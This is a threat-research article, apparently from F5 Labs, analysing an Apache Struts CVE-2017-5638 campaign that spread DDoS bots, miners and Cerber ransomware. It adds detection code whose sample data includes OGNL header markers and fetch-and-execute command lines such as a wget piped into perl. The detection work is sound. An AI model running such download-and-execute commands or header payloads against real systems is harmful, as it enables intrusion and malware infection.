From DDoS to Server Ransomware: Apache Struts 2 – CVE-2017-5638 Campaign
A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.
As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans come from researchers, but many of them are hostile exploit attempts. Following the disclosure of the “Jakarta Multipart Parser” vulnerability in APACHE STRUTS 2 (CVE-2017-5638) [1], F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.
This campaign started on the 10th of March, 2017, a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector appeared to be a slight modification of the original public exploit [2].
Figure 1: CVE-2017-5638 campaign
The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.
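Because the malicious input travels in the Content-Type header, a server-side check can be made without any exploit-specific signature: a legitimate header is a media type, and anything that is not one, or that carries OGNL expression syntax, deserves a closer look. The following detector is an added example written for this article, not F5's or the Apache project's code; the log line format and client addresses are constructed.

```python
import re

# RFC 7231 media-type grammar: type "/" subtype *( OWS ";" OWS token "=" ( token / quoted-string ) )
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'
_MEDIA_TYPE = re.compile(
    rf"^{_TOKEN}/{_TOKEN}(?:\s*;\s*{_TOKEN}=(?:{_TOKEN}|{_QUOTED}))*\s*$"
)
# Fragments that never belong in a media type but do appear in OGNL expressions.
_OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl", "#context")


def classify_content_type(value: str) -> str:
    """Return 'ognl-marker', 'malformed' or 'ok' for one Content-Type header value."""
    if any(marker in value for marker in _OGNL_MARKERS):
        return "ognl-marker"   # expression syntax smuggled into the header
    if not _MEDIA_TYPE.match(value):
        return "malformed"     # not a media type at all; vulnerable Struts 2 fed such values to OGNL
    return "ok"


# Constructed sample requests (client ip, method, path, header value); not real traffic.
SAMPLE_LOG = [
    "203.0.113.5 POST /struts2-showcase/ ct=%{(#_='multipart/form-data').(#placeholder)}",
    "198.51.100.7 POST /upload ct=multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "198.51.100.9 POST /api ct=multipart/form-data; boundary={broken}",
    '198.51.100.11 POST /api ct=application/json; charset="utf-8"',
]


def scan_log(lines):
    """Return (client_ip, verdict, header) for every request whose header is not a clean media type."""
    hits = []
    for line in lines:
        head, _, header = line.partition(" ct=")
        client_ip = head.split()[0]
        verdict = classify_content_type(header)
        if verdict != "ok":
            hits.append((client_ip, verdict, header))
    return hits


if __name__ == "__main__":
    for client_ip, verdict, header in scan_log(SAMPLE_LOG):
        print(f"{client_ip}: {verdict}: {header}")
```

The same check can run inside a WAF rule or a reverse proxy; the marker list is a cheap first filter, and the grammar check catches variants that avoid the usual markers.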
In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).
The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of binary file), running the malware, and removing the initial infection file.
Conventionally, attack payloads have relied on programs already installed on the target server, such as wget and curl, to download the malware. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of wget. With the “wget -qO -” options, the malware file is downloaded but never written to disk; instead, the content is piped straight into the Perl interpreter for execution, minimizing the detectable footprint on the host.
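Both infection styles described above (the staged download, chmod, run, delete sequence and the fileless “downloader piped into an interpreter” variant) have a recognisable shape in a recovered command line. The classifier below is an added example for this article, not code from F5 or from the campaign; the command lines are constructed, and the tool names it looks for are the ones named in the text plus a few common interpreters.

```python
import os
import re
import shlex

DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "sh", "bash", "python", "python2", "python3", "php"}


def _pipelines(cmdline: str):
    """Split a shell command line on ; && || into pipelines, each a list of argv lists."""
    result = []
    for segment in re.split(r"\s*(?:;|&&|\|\|)\s*", cmdline):
        if not segment.strip():
            continue
        stages = []
        for part in segment.split("|"):
            try:
                argv = shlex.split(part)
            except ValueError:          # unbalanced quotes: fall back to whitespace split
                argv = part.split()
            if argv:
                stages.append(argv)
        result.append(stages)
    return result


def classify_command(cmdline: str):
    """Return the suspicious patterns found in one command line (empty list if none)."""
    pipelines = _pipelines(cmdline)
    findings = []
    for stages in pipelines:
        for left, right in zip(stages, stages[1:]):
            # Downloader output piped straight into an interpreter: nothing touches the disk.
            if os.path.basename(left[0]) in DOWNLOADERS and os.path.basename(right[0]) in INTERPRETERS:
                findings.append("fileless-download-exec")
    programs = {os.path.basename(argv[0]) for stages in pipelines for argv in stages}
    # Download, chmod +x, run, delete: the classic staged drop described above.
    if programs & DOWNLOADERS and "chmod" in programs and "rm" in programs:
        findings.append("staged-drop-run-delete")
    return findings


# Constructed command lines, as they might be recovered from auditd execve records or shell history.
SAMPLE_COMMANDS = [
    "cd /tmp; wget -qO - http://example.invalid/a | perl",
    "cd /tmp; curl -O http://example.invalid/a; chmod +x a; ./a; rm -f a",
    "wget -q http://example.invalid/report.csv -O report.csv",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify_command(cmd) or ["clean"], cmd)
```

On a web server the parent process of such a command line is the application server itself, which is a stronger signal than the command text alone.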
Once the bot is in place, the infected server connects to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. After joining the IRC channel, F5 researchers observed that the botnet had more than 2,500 victims at the time of this writing, including production servers, and this number is for a single IRC channel alone.
Figure 2: IRC channel consisting of more than 2,500 bots phoning home
By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.
Figure 3: Example of infected machines connected to the IRC channel
From DDoS to Crypto Currency Mining
Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.
Figure 4: Downloading and running PERL bot
However, this time a “minerd” crypto coin mining program is downloaded as well, along with all of its prerequisites. The attacker disguises the malicious process and its configuration under names resembling the Apache server's, so that they look innocuous when the administrator of the infected machine lists the running processes.
Figure 5: Downloading “minerd” and its configuration
The bot then mines coins for several legitimate crypto pools, as shown in the configuration file in Figure 6.
Figure 6: “minerd” configuration file
These cryptocoin pools appear to be hosted in France under the “crypto-pool.fr” domain name, as shown in Figure 7.
Figure 7: Mining host in France in the Online SAS network
One of the more fascinating aspects of this malware is the creative technique the spearhead exploit uses to propagate itself. It searches for all the remote IP addresses that the server's administrator has connected to from this server. It reads the SSH “known_hosts” file, which records the IP addresses and fingerprints of every server the administrator has connected to, and it also scans the Bash history file for any IP addresses used in SSH commands. Once this list of IP addresses is compiled, the script tries to connect to each of them via SSH. Where authentication is configured to use a key file instead of a username and password, the malware deploys itself on the remote machine.
Figure 8: Malware propagating to other known servers
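The propagation step only works when a private key on the compromised host can be used without a passphrase and known_hosts lists targets in the clear. The audit below, an added example for this article and not F5's code, reports both conditions: it parses the OpenSSH and legacy PEM private-key formats for their cipher field or Proc-Type header, and counts hashed versus plaintext known_hosts entries. The key blobs are constructed header-only samples with no real key material.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def private_key_is_encrypted(key_text: str) -> bool:
    """True if the key needs a passphrase; False if any process reading the file can use it."""
    lines = [line.strip() for line in key_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM/OpenSSH private key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        # After the magic comes a length-prefixed cipher name; "none" means unencrypted.
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        cipher = blob[off + 4:off + 4 + n].decode()
        return cipher != "none"
    # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header.
    return any(line.startswith("Proc-Type:") and "ENCRYPTED" in line for line in lines)


def known_hosts_report(text: str) -> dict:
    """Count hashed (|1|...) versus plaintext host entries; plaintext entries expose the host list."""
    hashed = plain = 0
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("|1|"):
            hashed += 1
        else:
            plain += 1
    return {"hashed": hashed, "plaintext": plain}


# Constructed samples: openssh-key-v1 headers only (cipher "none" and "aes256-ctr"), no key material.
_UNENC = base64.b64encode(OPENSSH_MAGIC + struct.pack(">I", 4) + b"none").decode()
_ENC = base64.b64encode(OPENSSH_MAGIC + struct.pack(">I", 10) + b"aes256-ctr").decode()
SAMPLE_UNENCRYPTED = f"-----BEGIN OPENSSH PRIVATE KEY-----\n{_UNENC}\n-----END OPENSSH PRIVATE KEY-----\n"
SAMPLE_ENCRYPTED = f"-----BEGIN OPENSSH PRIVATE KEY-----\n{_ENC}\n-----END OPENSSH PRIVATE KEY-----\n"
SAMPLE_KNOWN_HOSTS = "|1|c2FsdA==|aGFzaA== ssh-ed25519 AAAAC3\n192.0.2.10 ssh-ed25519 AAAAC3\n"

if __name__ == "__main__":
    print("unencrypted key:", not private_key_is_encrypted(SAMPLE_UNENCRYPTED))
    print("known_hosts:", known_hosts_report(SAMPLE_KNOWN_HOSTS))
```

Running the audit over ~/.ssh on jump hosts and build servers shows where a single web-server compromise could be turned into lateral movement; passphrases on keys and `HashKnownHosts yes` in ssh_config address both findings.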
The ShellShock Connection
In general, threat actors treat new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was previously known to use the notorious ShellShock vulnerability (CVE-2014-6271) to deliver similar payloads.
Figure 9: Attacking host in Hong Kong on the Wharf T&T network.
F5 researchers noted that the malware file names have stayed the same, “.mailer” and “a”, as shown in Figures 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.
Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware appears to be one of the trends emerging since last year.
The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.
The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver previous payloads. However, the current executed shell commands run the Windows BITSAdmin and ftp command line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.
Figure 13: APACHE STRUTS exploit delivering Windows ransomware
Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.
Figure 14: Ransom message once infected
As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.
Figure 15: Ransom payout instructions
F5 researchers analyzed this malware variant and found that the author added functionality that modifies Windows firewall rules to block communication from installed anti-virus software to the outside world, thus preventing updates and reporting. The specific rules are shown in Figure 16.
Figure 16: Ransomware blocks Windows Defender
To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.
Figure 17: WMI queries to get the list of installed security products
It then traverses the files and folders returned by the query and adds any executables it finds to a firewall rule.
Figure 18: Adding firewall rules to block security products communication
The Attackers’ Payday
The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.
Figure 19: Bitcoin account located in malware configuration
This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at the current market value (bitcoin's value fluctuates slightly from day to day). Since the Struts exploit became publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.
Figure 20: Bitcoin transactions for the malware account
As we have seen in the past, it is remarkable how quickly threat actors who have been using older web vulnerabilities in their campaigns adapt and switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while defenders install patches.
The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.
In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.
Check back with F5 Labs for updates on how these campaigns advance.
Maxim is a Security Research Group Manager at F5 Networks, leading innovative research of web vulnerabilities and denial of service, evolving threats analysis, attack signature development and product hacking.
Julia Karpin is a senior malware researcher on the F5 security research team. She has been dealing with financial malware and its shenanigans for most of the current decade. Her main interest is Windows and Android malware, reverse engineering and automating every research aspect that can be automated. She has been a speaker at various security conferences, including REcon (@reconmtl), Virus Bulletin (@virusbtn), and OWASP Israel (@OWASPIL).